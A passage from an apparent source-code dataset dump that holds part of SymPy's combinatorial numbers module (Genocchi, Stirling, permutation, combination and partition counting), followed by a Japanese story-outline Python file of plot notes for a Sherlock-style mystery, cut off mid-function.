(n.is_noninteger and n.is_negative):\n return 4**n*gamma(n + S.Half)/(gamma(S.Half)*gamma(n + 2))\n\n if (n.is_integer and n.is_negative):\n if (n + 1).is_negative:\n return S.Zero\n if (n + 1).is_zero:\n return -S.Half\n\n def fdiff(self, argindex=1):\n from sympy import polygamma, log\n n = self.args[0]\n return catalan(n)*(polygamma(0, n + Rational(1, 2)) - polygamma(0, n + 2) + log(4))\n\n def _eval_rewrite_as_binomial(self, n):\n return binomial(2*n, n)/(n + 1)\n\n def _eval_rewrite_as_factorial(self, n):\n return factorial(2*n) / (factorial(n+1) * factorial(n))\n\n def _eval_rewrite_as_gamma(self, n):\n from sympy import gamma\n # The gamma function allows to generalize Catalan numbers to complex n\n return 4**n*gamma(n + S.Half)/(gamma(S.Half)*gamma(n + 2))\n\n def _eval_rewrite_as_hyper(self, n):\n from sympy import hyper\n return hyper([1 - n, -n], [2], 1)\n\n def _eval_rewrite_as_Product(self, n):\n from sympy import Product\n if not (n.is_integer and n.is_nonnegative):\n return self\n k = Dummy('k', integer=True, positive=True)\n return Product((n + k) / k, (k, 2, n))\n\n def _eval_evalf(self, prec):\n from sympy import gamma\n if self.args[0].is_number:\n return self.rewrite(gamma)._eval_evalf(prec)\n\n\n#----------------------------------------------------------------------------#\n# #\n# Genocchi numbers #\n# #\n#----------------------------------------------------------------------------#\n\n\nclass genocchi(Function):\n r\"\"\"\n Genocchi numbers\n\n The Genocchi numbers are a sequence of integers G_n that satisfy the\n relation::\n\n oo\n ____\n \\ `\n 2*t \\ n\n ------ = \\ G_n*t\n t / ------\n e + 1 / n!\n /___,\n n = 1\n\n Examples\n ========\n\n >>> from sympy import Symbol\n >>> from sympy.functions import genocchi\n >>> [genocchi(n) for n in range(1, 9)]\n [1, -1, 0, 1, 0, -3, 0, 17]\n >>> n = Symbol('n', integer=True, positive=True)\n >>> genocchi(2 * n + 1)\n 0\n\n References\n ==========\n\n .. [1] https://en.wikipedia.org/wiki/Genocchi_number\n .. [2] http://mathworld.wolfram.com/GenocchiNumber.html\n\n See Also\n ========\n\n bell, bernoulli, catalan, euler, fibonacci, harmonic, lucas\n \"\"\"\n\n @classmethod\n def eval(cls, n):\n if n.is_Number:\n if (not n.is_Integer) or n.is_nonpositive:\n raise ValueError(\"Genocchi numbers are defined only for \" +\n \"positive integers\")\n return 2 * (1 - S(2) ** n) * bernoulli(n)\n\n if n.is_odd and (n - 1).is_positive:\n return S.Zero\n\n if (n - 1).is_zero:\n return S.One\n\n def _eval_rewrite_as_bernoulli(self, n):\n if n.is_integer and n.is_nonnegative:\n return (1 - S(2) ** n) * bernoulli(n) * 2\n\n def _eval_is_integer(self):\n if self.args[0].is_integer and self.args[0].is_positive:\n return True\n\n def _eval_is_negative(self):\n n = self.args[0]\n if n.is_integer and n.is_positive:\n if n.is_odd:\n return False\n return (n / 2).is_odd\n\n def _eval_is_positive(self):\n n = self.args[0]\n if n.is_integer and n.is_positive:\n if n.is_odd:\n return fuzzy_not((n - 1).is_positive)\n return (n / 2).is_even\n\n def _eval_is_even(self):\n n = self.args[0]\n if n.is_integer and n.is_positive:\n if n.is_even:\n return False\n return (n - 1).is_positive\n\n def _eval_is_odd(self):\n n = self.args[0]\n if n.is_integer and n.is_positive:\n if n.is_even:\n return True\n return fuzzy_not((n - 1).is_positive)\n\n def _eval_is_prime(self):\n n = self.args[0]\n # only G_6 = -3 and G_8 = 17 are prime,\n # but SymPy does not consider negatives as prime\n # so only n=8 is tested\n return (n - 8).is_zero\n\n\n#######################################################################\n###\n### Functions for enumerating partitions, permutations and combinations\n###\n#######################################################################\n\n\nclass _MultisetHistogram(tuple):\n pass\n\n\n_N = -1\n_ITEMS = -2\n_M = slice(None, _ITEMS)\n\n\ndef _multiset_histogram(n):\n \"\"\"Return tuple used in permutation and combination counting. Input\n is a dictionary giving items with counts as values or a sequence of\n items (which need not be sorted).\n\n The data is stored in a class deriving from tuple so it is easily\n recognized and so it can be converted easily to a list.\n \"\"\"\n if type(n) is dict: # item: count\n if not all(isinstance(v, int) and v >= 0 for v in n.values()):\n raise ValueError\n tot = sum(n.values())\n items = sum(1 for k in n if n[k] > 0)\n return _MultisetHistogram([n[k] for k in n if n[k] > 0] + [items, tot])\n else:\n n = list(n)\n s = set(n)\n if len(s) == len(n):\n n = [1]*len(n)\n n.extend([len(n), len(n)])\n return _MultisetHistogram(n)\n m = dict(zip(s, range(len(s))))\n d = dict(zip(range(len(s)), [0]*len(s)))\n for i in n:\n d[m[i]] += 1\n return _multiset_histogram(d)\n\n\ndef nP(n, k=None, replacement=False):\n \"\"\"Return the number of permutations of ``n`` items taken ``k`` at a time.\n\n Possible values for ``n``::\n integer - set of length ``n``\n sequence - converted to a multiset internally\n multiset - {element: multiplicity}\n\n If ``k`` is None then the total of all permutations of length 0\n through the number of items represented by ``n`` will be returned.\n\n If ``replacement`` is True then a given item can appear more than once\n in the ``k`` items. (For example, for 'ab' permutations of 2 would\n include 'aa', 'ab', 'ba' and 'bb'.) The multiplicity of elements in\n ``n`` is ignored when ``replacement`` is True but the total number\n of elements is considered since no element can appear more times than\n the number of elements in ``n``.\n\n Examples\n ========\n\n >>> from sympy.functions.combinatorial.numbers import nP\n >>> from sympy.utilities.iterables import multiset_permutations, multiset\n >>> nP(3, 2)\n 6\n >>> nP('abc', 2) == nP(multiset('abc'), 2) == 6\n True\n >>> nP('aab', 2)\n 3\n >>> nP([1, 2, 2], 2)\n 3\n >>> [nP(3, i) for i in range(4)]\n [1, 3, 6, 6]\n >>> nP(3) == sum(_)\n True\n\n When ``replacement`` is True, each item can have multiplicity\n equal to the length represented by ``n``:\n\n >>> nP('aabc', replacement=True)\n 121\n >>> [len(list(multiset_permutations('aaaabbbbcccc', i))) for i in range(5)]\n [1, 3, 9, 27, 81]\n >>> sum(_)\n 121\n\n References\n ==========\n\n .. [1] http://en.wikipedia.org/wiki/Permutation\n\n See Also\n ========\n sympy.utilities.iterables.multiset_permutations\n\n \"\"\"\n try:\n n = as_int(n)\n except ValueError:\n return Integer(_nP(_multiset_histogram(n), k, replacement))\n return Integer(_nP(n, k, replacement))\n\n\n@cacheit\ndef _nP(n, k=None, replacement=False):\n from sympy.functions.combinatorial.factorials import factorial\n from sympy.core.mul import prod\n\n if k == 0:\n return 1\n if isinstance(n, SYMPY_INTS): # n different items\n # assert n >= 0\n if k is None:\n return sum(_nP(n, i, replacement) for i in range(n + 1))\n elif replacement:\n return n**k\n elif k > n:\n return 0\n elif k == n:\n return factorial(k)\n elif k == 1:\n return n\n else:\n # assert k >= 0\n return _product(n - k + 1, n)\n elif isinstance(n, _MultisetHistogram):\n if k is None:\n return sum(_nP(n, i, replacement) for i in range(n[_N] + 1))\n elif replacement:\n return n[_ITEMS]**k\n elif k == n[_N]:\n return factorial(k)/prod([factorial(i) for i in n[_M] if i > 1])\n elif k > n[_N]:\n return 0\n elif k == 1:\n return n[_ITEMS]\n else:\n # assert k >= 0\n tot = 0\n n = list(n)\n for i in range(len(n[_M])):\n if not n[i]:\n continue\n n[_N] -= 1\n if n[i] == 1:\n n[i] = 0\n n[_ITEMS] -= 1\n tot += _nP(_MultisetHistogram(n), k - 1)\n n[_ITEMS] += 1\n n[i] = 1\n else:\n n[i] -= 1\n tot += _nP(_MultisetHistogram(n), k - 1)\n n[i] += 1\n n[_N] += 1\n return tot\n\n\n@cacheit\ndef _AOP_product(n):\n \"\"\"for n = (m1, m2, .., mk) return the coefficients of the polynomial,\n prod(sum(x**i for i in range(nj + 1)) for nj in n); i.e. the coefficients\n of the product of AOPs (all-one polynomials) or order given in n. The\n resulting coefficient corresponding to x**r is the number of r-length\n combinations of sum(n) elements with multiplicities given in n.\n The coefficients are given as a default dictionary (so if a query is made\n for a key that is not present, 0 will be returned).\n\n Examples\n ========\n\n >>> from sympy.functions.combinatorial.numbers import _AOP_product\n >>> from sympy.abc import x\n >>> n = (2, 2, 3) # e.g. aabbccc\n >>> prod = ((x**2 + x + 1)*(x**2 + x + 1)*(x**3 + x**2 + x + 1)).expand()\n >>> c = _AOP_product(n); dict(c)\n {0: 1, 1: 3, 2: 6, 3: 8, 4: 8, 5: 6, 6: 3, 7: 1}\n >>> [c[i] for i in range(8)] == [prod.coeff(x, i) for i in range(8)]\n True\n\n The generating poly used here is the same as that listed in\n http://tinyurl.com/cep849r, but in a refactored form.\n\n \"\"\"\n from collections import defaultdict\n\n n = list(n)\n ord = sum(n)\n need = (ord + 2)//2\n rv = [1]*(n.pop() + 1)\n rv.extend([0]*(need - len(rv)))\n rv = rv[:need]\n while n:\n ni = n.pop()\n N = ni + 1\n was = rv[:]\n for i in range(1, min(N, len(rv))):\n rv[i] += rv[i - 1]\n for i in range(N, need):\n rv[i] += rv[i - 1] - was[i - N]\n rev = list(reversed(rv))\n if ord % 2:\n rv = rv + rev\n else:\n rv[-1:] = rev\n d = defaultdict(int)\n for i in range(len(rv)):\n d[i] = rv[i]\n return d\n\n\ndef nC(n, k=None, replacement=False):\n \"\"\"Return the number of combinations of ``n`` items taken ``k`` at a time.\n\n Possible values for ``n``::\n integer - set of length ``n``\n sequence - converted to a multiset internally\n multiset - {element: multiplicity}\n\n If ``k`` is None then the total of all combinations of length 0\n through the number of items represented in ``n`` will be returned.\n\n If ``replacement`` is True then a given item can appear more than once\n in the ``k`` items. (For example, for 'ab' sets of 2 would include 'aa',\n 'ab', and 'bb'.) The multiplicity of elements in ``n`` is ignored when\n ``replacement`` is True but the total number of elements is considered\n since no element can appear more times than the number of elements in\n ``n``.\n\n Examples\n ========\n\n >>> from sympy.functions.combinatorial.numbers import nC\n >>> from sympy.utilities.iterables import multiset_combinations\n >>> nC(3, 2)\n 3\n >>> nC('abc', 2)\n 3\n >>> nC('aab', 2)\n 2\n\n When ``replacement`` is True, each item can have multiplicity\n equal to the length represented by ``n``:\n\n >>> nC('aabc', replacement=True)\n 35\n >>> [len(list(multiset_combinations('aaaabbbbcccc', i))) for i in range(5)]\n [1, 3, 6, 10, 15]\n >>> sum(_)\n 35\n\n If there are ``k`` items with multiplicities ``m_1, m_2, ..., m_k``\n then the total of all combinations of length 0 hrough ``k`` is the\n product, ``(m_1 + 1)*(m_2 + 1)*...*(m_k + 1)``. When the multiplicity\n of each item is 1 (i.e., k unique items) then there are 2**k\n combinations. For example, if there are 4 unique items, the total number\n of combinations is 16:\n\n >>> sum(nC(4, i) for i in range(5))\n 16\n\n References\n ==========\n\n .. [1] http://en.wikipedia.org/wiki/Combination\n .. [2] http://tinyurl.com/cep849r\n\n See Also\n ========\n sympy.utilities.iterables.multiset_combinations\n \"\"\"\n from sympy.functions.combinatorial.factorials import binomial\n from sympy.core.mul import prod\n\n if isinstance(n, SYMPY_INTS):\n if k is None:\n if not replacement:\n return 2**n\n return sum(nC(n, i, replacement) for i in range(n + 1))\n if k < 0:\n raise ValueError(\"k cannot be negative\")\n if replacement:\n return binomial(n + k - 1, k)\n return binomial(n, k)\n if isinstance(n, _MultisetHistogram):\n N = n[_N]\n if k is None:\n if not replacement:\n return prod(m + 1 for m in n[_M])\n return sum(nC(n, i, replacement) for i in range(N + 1))\n elif replacement:\n return nC(n[_ITEMS], k, replacement)\n # assert k >= 0\n elif k in (1, N - 1):\n return n[_ITEMS]\n elif k in (0, N):\n return 1\n return _AOP_product(tuple(n[_M]))[k]\n else:\n return nC(_multiset_histogram(n), k, replacement)\n\n\n@cacheit\ndef _stirling1(n, k):\n if n == k == 0:\n return S.One\n if 0 in (n, k):\n return S.Zero\n n1 = n - 1\n\n # some special values\n if n == k:\n return S.One\n elif k == 1:\n return factorial(n1)\n elif k == n1:\n return binomial(n, 2)\n elif k == n - 2:\n return (3*n - 1)*binomial(n, 3)/4\n elif k == n - 3:\n return binomial(n, 2)*binomial(n, 4)\n\n # general recurrence\n return n1*_stirling1(n1, k) + _stirling1(n1, k - 1)\n\n\n@cacheit\ndef _stirling2(n, k):\n if n == k == 0:\n return S.One\n if 0 in (n, k):\n return S.Zero\n n1 = n - 1\n\n # some special values\n if k == n1:\n return binomial(n, 2)\n elif k == 2:\n return 2**n1 - 1\n\n # general recurrence\n return k*_stirling2(n1, k) + _stirling2(n1, k - 1)\n\n\ndef stirling(n, k, d=None, kind=2, signed=False):\n \"\"\"Return Stirling number S(n, k) of the first or second (default) kind.\n\n The sum of all Stirling numbers of the second kind for k = 1\n through n is bell(n). The recurrence relationship for these numbers\n is::\n\n {0} {n} {0} {n + 1} {n} { n }\n { } = 1; { } = { } = 0; { } = j*{ } + { }\n {0} {0} {k} { k } {k} {k - 1}\n\n where ``j`` is::\n ``n`` for Stirling numbers of the first kind\n ``-n`` for signed Stirling numbers of the first kind\n ``k`` for Stirling numbers of the second kind\n\n The first kind of Stirling number counts the number of permutations of\n ``n`` distinct items that have ``k`` cycles; the second kind counts the\n ways in which ``n`` distinct items can be partitioned into ``k`` parts.\n If ``d`` is given, the \"reduced Stirling number of the second kind\" is\n returned: ``S^{d}(n, k) = S(n - d + 1, k - d + 1)`` with ``n >= k >= d``.\n (This counts the ways to partition ``n`` consecutive integers into\n ``k`` groups with no pairwise difference less than ``d``. See example\n below.)\n\n To obtain the signed Stirling numbers of the first kind, use keyword\n ``signed=True``. Using this keyword automatically sets ``kind`` to 1.\n\n Examples\n ========\n\n >>> from sympy.functions.combinatorial.numbers import stirling, bell\n >>> from sympy.combinatorics import Permutation\n >>> from sympy.utilities.iterables import multiset_partitions, permutations\n\n First kind (unsigned by default):\n\n >>> [stirling(6, i, kind=1) for i in range(7)]\n [0, 120, 274, 225, 85, 15, 1]\n >>> perms = list(permutations(range(4)))\n >>> [sum(Permutation(p).cycles == i for p in perms) for i in range(5)]\n [0, 6, 11, 6, 1]\n >>> [stirling(4, i, kind=1) for i in range(5)]\n [0, 6, 11, 6, 1]\n\n First kind (signed):\n\n >>> [stirling(4, i, signed=True) for i in range(5)]\n [0, -6, 11, -6, 1]\n\n Second kind:\n\n >>> [stirling(10, i) for i in range(12)]\n [0, 1, 511, 9330, 34105, 42525, 22827, 5880, 750, 45, 1, 0]\n >>> sum(_) == bell(10)\n True\n >>> len(list(multiset_partitions(range(4), 2))) == stirling(4, 2)\n True\n\n Reduced second kind:\n\n >>> from sympy import subsets, oo\n >>> def delta(p):\n ... if len(p) == 1:\n ... return oo\n ... return min(abs(i[0] - i[1]) for i in subsets(p, 2))\n >>> parts = multiset_partitions(range(5), 3)\n >>> d = 2\n >>> sum(1 for p in parts if all(delta(i) >= d for i in p))\n 7\n >>> stirling(5, 3, 2)\n 7\n\n References\n ==========\n\n .. [1] http://en.wikipedia.org/wiki/Stirling_numbers_of_the_first_kind\n .. [2] http://en.wikipedia.org/wiki/Stirling_numbers_of_the_second_kind\n\n See Also\n ========\n sympy.utilities.iterables.multiset_partitions\n\n \"\"\"\n # TODO: make this a class like bell()\n\n n = as_int(n)\n k = as_int(k)\n if n < 0:\n raise ValueError('n must be nonnegative')\n if k > n:\n return S.Zero\n if d:\n # assert k >= d\n # kind is ignored -- only kind=2 is supported\n return _stirling2(n - d + 1, k - d + 1)\n elif signed:\n # kind is ignored -- only kind=1 is supported\n return (-1)**(n - k)*_stirling1(n, k)\n\n if kind == 1:\n return _stirling1(n, k)\n elif kind == 2:\n return _stirling2(n, k)\n else:\n raise ValueError('kind must be 1 or 2, not %s' % k)\n\n\n@cacheit\ndef _nT(n, k):\n \"\"\"Return the partitions of ``n`` items into ``k`` parts. This\n is used by ``nT`` for the case when ``n`` is an integer.\"\"\"\n if k == 0:\n return 1 if k == n else 0\n return sum(_nT(n - k, j) for j in range(min(k, n - k) + 1))\n\n\ndef nT(n, k=None):\n \"\"\"Return the number of ``k``-sized partitions of ``n`` items.\n\n Possible values for ``n``::\n integer - ``n`` identical items\n sequence - converted to a multiset internally\n multiset - {element: multiplicity}\n\n Note: the convention for ``nT`` is different than that of ``nC`` and\n ``nP`` in that\n here an integer indicates ``n`` *identical* items instead of a set of\n length ``n``; this is in keeping with the ``partitions`` function which\n treats its integer-``n`` input like a list of ``n`` 1s. One can use\n ``range(n)`` for ``n`` to indicate ``n`` distinct items.\n\n If ``k`` is None then the total number of ways to partition the elements\n represented in ``n`` will be returned.\n\n Examples\n ========\n\n >>> from sympy.functions.combinatorial.numbers import nT\n\n Partitions of the given multiset:\n\n >>> [nT('aabbc', i) for i in range(1, 7)]\n [1, 8, 11, 5, 1, 0]\n >>> nT('aabbc') == sum(_)\n True\n\n >>> [nT(\"mississippi\", i) for i in range(1, 12)]\n [1, 74, 609, 1521, 1768, 1224, 579, 197, 50, 9, 1]\n\n Partitions when all items are identical:\n\n >>> [nT(5, i) for i in range(1, 6)]\n [1, 2, 2, 1, 1]\n >>> nT('1'*5) == sum(_)\n True\n\n When all items are different:\n\n >>> [nT(range(5), i) for i in range(1, 6)]\n [1, 15, 25, 10, 1]\n >>> nT(range(5)) == sum(_)\n True\n\n References\n ==========\n\n .. [1] http://undergraduate.csse.uwa.edu.au/units/CITS7209/partition.pdf\n\n See Also\n ========\n sympy.utilities.iterables.partitions\n sympy.utilities.iterables.multiset_partitions\n\n \"\"\"\n from sympy.utilities.enumerative import MultisetPartitionTraverser\n\n if isinstance(n, SYMPY_INTS):\n # assert n >= 0\n # all the same\n if k is None:\n return sum(_nT(n, k) for k in range(1, n + 1))\n return _nT(n, k)\n if not isinstance(n, _MultisetHistogram):\n try:\n # if n contains hashable items there is some\n # quick handling that can be done\n u = len(set(n))\n if u == 1:\n return nT(len(n), k)\n elif u == len(n):\n n = range(u)\n raise TypeError\n except TypeError:\n n = _multiset_histogram(n)\n N = n[_N]\n if k is None and N == 1:\n return 1\n if k in (1, N):\n return 1\n if k == 2 or N == 2 and k is None:\n m, r = divmod(N, 2)\n rv = sum(nC(n, i) for i in range(1, m + 1))\n if not r:\n rv -= nC(n, m)//2\n if k is None:\n rv += 1 # for k == 1\n return rv\n if N == n[_ITEMS]:\n # all distinct\n if k is None:\n return bell(N)\n return stirling(N, k)\n m = MultisetPartitionTraverser()\n if k is None:\n return m.count_partitions(n[_M])\n # MultisetPartitionTraverser does not have a range-limited count\n # method, so need to enumerate and count\n tot = 0\n for discard in m.enum_range(n[_M], k-1, k):\n tot += 1\n return tot\n"} {"ext": "py", "sha": "1a2ec17c06808474025044eecb4c169d51620cd8", "content": "# -*- coding: utf-8 -*-\n'''\nStage: \"シャーロックの家\"\n'''\nimport os\nimport sys\nsys.path.append(os.path.join(os.path.dirname(__file__), '../../..'))\nsys.path.append('storybuilder')\nfrom storybuilder.builder.world import World\n\n\n# NOTE\n# 物語が展開する中心。事務所\n# シャーロックが借りて住んでいる古い一軒家(二階建て)で、B221という看板が近くにある\n# 幽霊が出るといういわくつきの物件で安かった。原因は地場発生の魔石があっただけ\n# :2F\n# [物置][空き部屋]\n# [寝室1][寝室2]\n# :1F\n# [キッチン][バス]\n# [ダイニング][トイレ]\n# [研究室]\n# [リビング][書斎]\n\n\n# alias\nHOME = \"SherlockHouse\"\nLIVING = \"SherlockHouseLiving\"\nKITCHEN = \"SherlockHouseKitchen\"\nBATHROOM = \"SherlockHouseBathroom\"\nDINING = \"SherlockHouseDining\"\nLABO = \"SherlockHouseLabo\"\nREADING = \"SherlockHouseReadingRoom\"\nBEDROOM = \"SherlockHouseBedroom\"\nSTORAGE = \"SherlockHouseStorage\"\n\n\n## scenes\ndef about_sherlock(w: World):\n return w.scene(\"$sherlockという男について\",\n w.plot_note(\"知っていたならなぜ忠告してくれなかったんだ、と$wilsonが$sherlockに文句をいい、なんとか家に入れてもらえる\"),\n w.plot_note(\"中に入るとそこら中に本や資料がちらばっていた\"),\n w.plot_note(\"$wilsonはそこで依頼をしようと思ったが、\"),\n w.plot_note(\"そこに何も記載のない手紙が投げ込まれた\"),\n )\n\n\ndef read_prince_letter(w: World):\n return w.scene(\"皇太子の書簡の中身\",\n w.plot_note(\"手紙には独特の紙が使われていて、それが王室のものだと$sherlockは分かった\"),\n w.plot_note(\"中は皇太子からの手紙で、$sherlockに頼みごとが書かれていた\"),\n w.plot_note(\"皇太子は女遊びがひどくてその界隈では有名だが、今回ついに腰を落ち着けて結婚することになった\"),\n w.plot_note(\"相手は近隣の公国の王女で、政治的な意味合いも大きい\"),\n w.plot_note(\"その結婚に際して過去の女性関係をすべて綺麗にした\"),\n w.plot_note(\"ただある一人の女性にプレゼントしてしまった大切なナイフを返してもらいたいが、相手の女性が応じてくれない\"),\n w.plot_note(\"揉め事をおこしたくないので、穏便にすませたいから、$sherlockに彼女を説得して、ナイフを返してもらってくれないか、という依頼\"),\n w.plot_note(\"$sherlockはその依頼内容について、書かれていない部分の推測を述べる\"),\n w.plot_note(\"ナイフと書いているが、実際は王室に伝わる宝剣で、それが王の証の一つで、結婚の際には儀式内で使われる\"),\n w.plot_note(\"酒の勢いで大切な宝剣をあげてしまったのだろうと\"),\n w.plot_note(\"そんなものを取り戻す義理はないが、恩があるので仕方なく依頼を受けると言った\"),\n w.plot_note(\"$sherlockは$wilsonにその女性の家まで送ってほしいと頼んだ\"),\n )\n\n\ndef important_than_sword(w: World):\n return w.scene(\"宝剣より大事なこと\",\n w.plot_note(\"$sherlockは宝剣よりも殺人事件についての調査をしたいと、$wilsonを家に置いて出ていってしまう\"),\n w.plot_note(\"$wilsonは$sherlockの家に戻り、そこで彼を待つことにする\"),\n w.plot_note(\"やってきた若い刑事は$sherlockがいないことに落胆しつつも、状況を教えてくれる\"),\n w.plot_note(\"発見された遺体は一月ほど前に行方不明になった女性だった\"),\n w.plot_note(\"$ailyとは何の関係もなく、そこの接点も見つけられないと嘆く\"),\n w.plot_note(\"殺害方法も不明で、凶器すら見つけられないと\"),\n w.plot_note(\"そこに役所の男から$ailyという女性が住民登録をしたという形跡は見つけられなかったと連絡がきた\"),\n )\n\n\ndef housemate_mary(w: World):\n return w.scene(\"同居人$mary\",\n w.plot_note(\"同居するようになった$maryはやたらと$sherlockにまとわりつく\"),\n w.plot_note(\"$sherlockは大好きな読書もできず、困っていた\"),\n )\n\n\ndef mary_has_worry(w: World):\n return w.scene(\"$maryの悩み\",\n w.plot_note(\"$maryは彼の迷惑になりたくなくて、$wilsonに相談する\"),\n w.plot_note(\"女手が不足しているから自分が役立つところをアピールしてみたら、と助言を受ける\"),\n w.plot_note(\"$maryは掃除や買い物を買って出る\"),\n )\n\n\ndef about_missings(w: World):\n return w.scene(\"失踪者について\",\n w.plot_note(\"やっと外に出てくれてほっとした$sherlockは$wilsonに事件について相談する\"),\n w.plot_note(\"最近謎の失踪者が増えていた\"),\n w.plot_note(\"失踪事件として新聞や雑誌も特集を組んでいる\"),\n w.plot_note(\"$wilsonはその調査を$sherlockに依頼していたが、未だに何も情報がなかった\"),\n )\n\n\ndef strange_armor_knight(w: World):\n return w.scene(\"奇妙な鎧騎士\",\n w.plot_note(\"そこに$maryが見知らぬ人を連れて戻ってくる\"),\n w.plot_note(\"道端で困っていたから拾ったけれど言葉がしゃべれないのだと$maryは説明した\"),\n )\n\n\ndef strange_work(w: World):\n return w.scene(\"奇妙な仕事\",\n w.plot_note(\"その鎧騎士は$sherlockに$limeと名乗った(筆談で)\"),\n w.plot_note(\"彼女は今ある老夫婦の家に居候しているが、彼らの知人の質屋の護衛のアルバイトをしていた\"),\n w.plot_note(\"守衛仲間の$binsと交代しながら閉店時刻まで警備をしている\"),\n w.plot_note(\"その$binsから別のバイトを紹介され、今は途中にそちらもやっている\"),\n w.plot_note(\"その別のバイトが相談したいことだった\"),\n w.plot_note(\"最初に$binsからチラシを見せてもらったときには「赤い鎧の者だけがバイト資格がある」と書かれていた\"),\n w.plot_note(\"仕事内容はじっと座ってある本の写しを作る作業を三時間行うだけで、週給で結構な金額がもらえた\"),\n w.plot_note(\"実際に面接に行ってみると確かに赤い鎧を来た人間が集まっていたが、$limeみたいに見事に全身赤という者はいなかった\"),\n w.plot_note(\"主催者である赤鎧クラブは彼女を合格とし、その翌日から守衛を抜け出して三時間、そのアルバイトをしているらしい\"),\n w.plot_note(\"オーナー夫婦には申し訳なく感じているが、そのお金でプレゼントしたいと思っているのだと説明する\"),\n w.plot_note(\"その話をきいて$sherlockは彼女に今すぐそのアルバイトを辞めるようにとだけ言った\"),\n )\n\n\ndef reason_for_lime_work(w: World):\n return w.scene(\"$sherlockの忠告\",\n w.plot_note(\"家に帰った$maryはどうしてあんな風に言ったのか$sherlockに問いただす\"),\n w.plot_note(\"$sherlockはそんなにうまい話は存在しないし、自分が知る限り「赤鎧クラブ」なんてものは存在しないと断言する\"),\n w.plot_note(\"$maryは実際に持ち帰ったチラシを見せながら、彼女を拾ってくれたオーナーさんや同僚の$binsの優しさを力説する\"),\n w.plot_note(\"しかし後日$sherlockの言っていたように問題が発生する\"),\n w.plot_note(\"その近所にあった改装中の銀行が強盗に襲われた\"),\n w.plot_note(\"警備員が気づいて連絡したが、表からも裏からも誰も入ってはおらず、謎の強盗と話題になっていた\"),\n w.plot_note(\"しかし現地を調べたところ、抜け穴が掘ってあり、大量のダイヤと金塊が盗まれたあとだった\"),\n w.plot_note(\"しかもその抜け穴は質屋に繋がっていたのだ\"),\n w.plot_note(\"その質屋のオーナー夫婦も逮捕され、$limeも容疑者の一人として逮捕された\"),\n )\n\n\ndef help_lime_please(w: World):\n return w.scene(\"$limeを助けて\",\n w.plot_note(\"$maryが$limeを助けてやってほしいと$sherlockに言う\"),\n w.plot_note(\"$sherlockは自分の忠告を聞かなかったからだと言うが、それでも話だけは聞くと言う\"),\n w.plot_note(\"質屋につながっていた抜け穴の中で、重要参考人だった$ignesが遺体で発見された\"),\n w.plot_note(\"その容疑者として$limeが逮捕され、オーナー夫婦も事情聴取を受けている最中らしい\"),\n w.plot_note(\"強盗の件についても調査中で、全部彼女に押し付けられるかもしれないと言い出す\"),\n w.plot_note(\"$sherlockはその質屋に案内してもらう\"),\n )\n\n\ndef limes_talk_of_strange_case(w: World):\n return w.scene(\"奇妙な事件についての$limeの話\",\n w.plot_note(\"$maryが$limeを拾い、再び家へと連れてくる\"),\n w.plot_note(\"$sherlockは銀行から盗まれたものがダイヤだけじゃないと睨むが、教えてもらえなかった\"),\n w.plot_note(\"家に戻ってくると$sherlockはそこに$limeがいることに頭を抱える\"),\n w.plot_note(\"$limeがしゃべれないのは呪いの鎧のせいだと言う\"),\n w.plot_note(\"その呪いをといてもらおうと、知人の神官を読んでいた\"),\n w.plot_note(\"呪いを解いたが$limeはしゃべれないままだった\"),\n w.plot_note(\"その$limeは筆談で自分が王室の人間であると告白する\"),\n )\n\n\ndef lime_was_royal_family(w: World):\n return w.scene(\"$limeは王家の人間\",\n w.plot_note(\"$limeは自分が誘拐された訳ではなく、普通に家出をしたのだと告白する\"),\n w.plot_note(\"王室はそんな品の悪い発表をできないから失踪事件にして公表したのだと言った\"),\n w.plot_note(\"もともと妾の子で、周囲から浮いていて、王室にも自分の居場所がなく帰りたくないと泣く\"),\n )\n\n\ndef newcommer_lime(w: World):\n return w.scene(\"新しい同居人$lime\",\n w.plot_note(\"$maryは$sherlockに$limeを一緒に住まわせてほしいとお願いする\"),\n w.plot_note(\"$sherlockは金銭的な問題さえ解決できればと提案する\"),\n w.plot_note(\"$wilsonは金のことなら大丈夫だと、なぜか大金を手にして言う\"),\n w.plot_note(\"$wilsonは$sherlockの秘蔵コレクションを売り払っていた\"),\n w.plot_note(\"こうして新しい住人$limeをここに加えることになった\"),\n )\n\n\ndef cooker_lime(w: World):\n return w.scene(\"料理人$lime\",\n w.plot_note(\"$limeは料理担当になっていて、そのガチョウをもらってさばいてくれる\"),\n )\n\n\ndef marys_market_talk(w: World):\n return w.scene(\"$maryの市場の話\",\n w.plot_note(\"$maryは市場で仕入れた面白い話を$sherlockに話す\"),\n w.plot_note(\"今市場ではガチョウからダイヤが出てくると話題になっていた\"),\n w.plot_note(\"$limeがやってきて、何か出たという\"),\n w.plot_note(\"ガチョウの中から出てきたのは血がついたナイフだった\"),\n )\n\n\ndef knife_in_the_goose(w: World):\n return w.scene(\"ガチョウの中の凶器\",\n w.plot_note(\"$sherlockはそれがなにかの事件の凶器だと分かり、すぐに警察に連絡を取る\"),\n w.plot_note(\"$restradeがやってきて、それは現在彼が追っている事件の重要な証拠品だと言われた\"),\n )\n\n\ndef restrade_talk_about_goose_knife(w: World):\n return w.scene(\"$restradeのガチョウの凶器事件の話\",\n w.plot_note(\"$restradeからその事件についての概要を聞く\"),\n w.plot_note(\"事件はある一軒家で起こった\"),\n w.plot_note(\"引退した学者が謎の死を遂げた\"),\n w.plot_note(\"刺殺だったのだが凶器が発見されず、犯人も特定されないまま現在に至る\"),\n w.plot_note(\"そのナイフを警部に渡して調べてもらう\"),\n w.plot_note(\"その間に興味をもった$sherlockは一人でその現場を調べに出ていってしまう\"),\n w.plot_note(\"後日、そのナイフからずっと失踪中の$jackの指紋が検出された\"),\n )\n\n\ndef backhome_mary_with_jack_wanted(w: World):\n return w.scene(\"$jack容疑者の話を持って返ってきた$mary\",\n w.plot_note(\"戻ってきた$sherlockは$maryからそのことを聞き、\"),\n w.plot_note(\"$sherlockは現場を見てきたことを$maryたちに話す\"),\n )\n\n\ndef talk_about_goose_case(w: World):\n return w.scene(\"ガチョウ凶器事件についての調査\",\n w.plot_note(\"現場は住宅街から少し離れた郊外の一軒家で、男は民間の研究所をやめたあとも個人的に何かを研究していた\"),\n w.plot_note(\"歴史学と民俗学に造形が深く、$sherlockもその所蔵していた資料に関心をしたくらい\"),\n w.plot_note(\"彼が書き残しているものの一つに古代の技法がいくつか紹介されていた\"),\n w.plot_note(\"刺された場所は彼の家だが、凶器は消えている\"),\n w.plot_note(\"ただし$jackとの関係性は全く見えず、彼女ならそんな手段を使わないと$sherlockは考えた\"),\n 